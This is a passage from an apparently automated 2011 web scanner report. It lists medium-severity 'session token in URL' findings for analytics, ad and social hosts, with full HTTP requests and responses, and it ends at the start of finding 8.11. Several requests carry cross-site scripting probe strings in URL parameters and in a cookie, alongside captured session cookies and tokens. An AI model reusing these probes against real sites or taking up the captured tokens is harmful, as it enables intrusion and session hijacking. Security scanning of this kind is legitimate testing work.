http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard
http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard
http://registercom.tt.omtrdc.net/m2/registercom/sc/standard
http://research.microsoft.com/en-us/about/awards.aspx
http://research.microsoft.com/en-us/people/ajbrush/default.aspx
http://research.microsoft.com/en-us/um/people/ymwang/
http://www.facebook.com/extern/login_status.php
http://www.meetup.com/api/
http://www.register.com/css/home-optimized.css
http://www.register.com/js/aop-attach.js
http://www.register.com/js/homepage-optimized.js
http://www.register.com/js/jquery-1.3.2.min.js

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://bh.contextweb.com/bh/set.aspx?action=replace&advid=749&token=DOTM5

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.2. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&source=share4x&publisher=null&hostname=www.hostnj.net&location=%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&url=http%3A%2F%2Fwww.hostnj.net%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&sessionID=1315085425389.39976&fpc=c6276e8-13231331aee-5ff43484-1&ts1315085426455.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dssl%2Bcertificates%23q%3Dssl%2Bcertificates%26hl%3Den%26prmd%3Divnsufd%26source%3Dlnms%26tbm%3Dshop%26ei%3D_5tiTr_COO_SiAKums2VCg%26sa%3DX%26oi%3Dmode_link%26ct%3Dmode%26cd%3D5%26ved%3D0CFYQ_AUoBA%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Dd8e70e66cd7c7a51%26biw%3D1233%26bih%3D1037

Request

GET /pview?event=pview&source=share4x&publisher=null&hostname=www.hostnj.net&location=%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&url=http%3A%2F%2Fwww.hostnj.net%2Fproducts-page%2Fssl-security%2Fcomodo-intranet-ssl-certificate%2F&sessionID=1315085425389.39976&fpc=c6276e8-13231331aee-5ff43484-1&ts1315085426455.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dssl%2Bcertificates%23q%3Dssl%2Bcertificates%26hl%3Den%26prmd%3Divnsufd%26source%3Dlnms%26tbm%3Dshop%26ei%3D_5tiTr_COO_SiAKums2VCg%26sa%3DX%26oi%3Dmode_link%26ct%3Dmode%26cd%3D5%26ved%3D0CFYQ_AUoBA%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Dd8e70e66cd7c7a51%26biw%3D1233%26bih%3D1037 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sat, 03 Sep 2011 21:36:49 GMT
Connection: keep-alive

8.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=75207&profile.geo_gmt_offset=-500&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=tx&profile.geo_region_code=44&profile.geo_city=dallas&profile.geo_city_code=77&mbox=omniTargetingInfo&mboxId=0&mboxTime=1315043065881&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=75207&profile.geo_gmt_offset=-500&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=tx&profile.geo_region_code=44&profile.geo_city=dallas&profile.geo_city_code=77&mbox=omniTargetingInfo&mboxId=0&mboxTime=1315043065881&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2488
Date: Sat, 03 Sep 2011 14:43:47 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

8.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 146
Date: Sat, 03 Sep 2011 14:44:01 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

8.5. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://registercom.tt.omtrdc.net
Path:	/m2/registercom/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=2&mbox=homepageRedirect&mboxId=0&mboxTime=1315067402071&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39

Request

GET /m2/registercom/mbox/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=2&mbox=homepageRedirect&mboxId=0&mboxTime=1315067402071&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 797
Date: Sat, 03 Sep 2011 21:29:23 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('homepageRedirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default
...[SNIP]...

8.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://registercom.tt.omtrdc.net
Path:	/m2/registercom/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://registercom.tt.omtrdc.net/m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sat, 03 Sep 2011 21:32:51 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

8.7. http://research.microsoft.com/en-us/about/awards.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://research.microsoft.com
Path:	/en-us/about/awards.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://delivery.acm.org/10.1145/50000/42283/p288-dwork.pdf?key1=42283&key2=7098097811&coll=GUIDE&dl=GUIDE&CFID=25524953&CFTOKEN=27642754

Request

GET /en-us/about/awards.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/research/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

8.8. http://research.microsoft.com/en-us/people/ajbrush/default.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://research.microsoft.com
Path:	/en-us/people/ajbrush/default.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://portal.acm.org/citation.cfm?id=1268551&coll=portal&dl=ACM&CFID=26746030&CFTOKEN=26792350

Request

GET /en-us/people/ajbrush/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.9. http://research.microsoft.com/en-us/um/people/ymwang/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://research.microsoft.com
Path:	/en-us/um/people/ymwang/

Issue detail

The response contains the following links that appear to contain session tokens:

http://portal.acm.org/citation.cfm?id=568522.568525&coll=portal&dl=ACM&CFID=4668864&CFTOKEN=2689140

Request

GET /en-us/um/people/ymwang/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 01 Aug 2011 17:09:19 GMT
Accept-Ranges: bytes
ETag: "a68445c06d50cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:06 GMT
Connection: close
Content-Length: 169997

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xml
...[SNIP]...
</span> and rollback-recovery
and was a main co-author of the most influential <a
href="http://portal.acm.org/citation.cfm?id=568522.568525&coll=portal&dl=ACM&CFID=4668864&CFTOKEN=2689140#FullText" onClick="stc(this, 17)"><span
style='color:black;mso-themecolor:text1'>
...[SNIP]...
<span style='font-size:
11.0pt;mso-bidi-font-size:12.0pt;font-family:"Arial","sans-serif"'><a
href="http://portal.acm.org/citation.cfm?id=568522.568525&coll=portal&dl=ACM&CFID=4668864&CFTOKEN=2689140#FullText" onClick="stc(this, 125)"><span
style='color:#EAEAEA;text-decoration:none;text-underline:none'>
...[SNIP]...

8.10. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdba7b9bc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34dcad608%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28e4d4dc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e21e8cb4%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2948d778c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdba7b9bc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34dcad608%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28e4d4dc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e21e8cb4%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2948d778c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.51.64
X-Cnection: close
Date: Sat, 03 Sep 2011 13:11:37 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f2e21e8cb4&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff357a4a1fc&relation=parent&transport=postmessage&frame=f34cdf2834", "http:\/\
...[SNIP]...

8.11. http://www.meetup.com/api/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.meetup.com
Path:	/api/

Issue detail

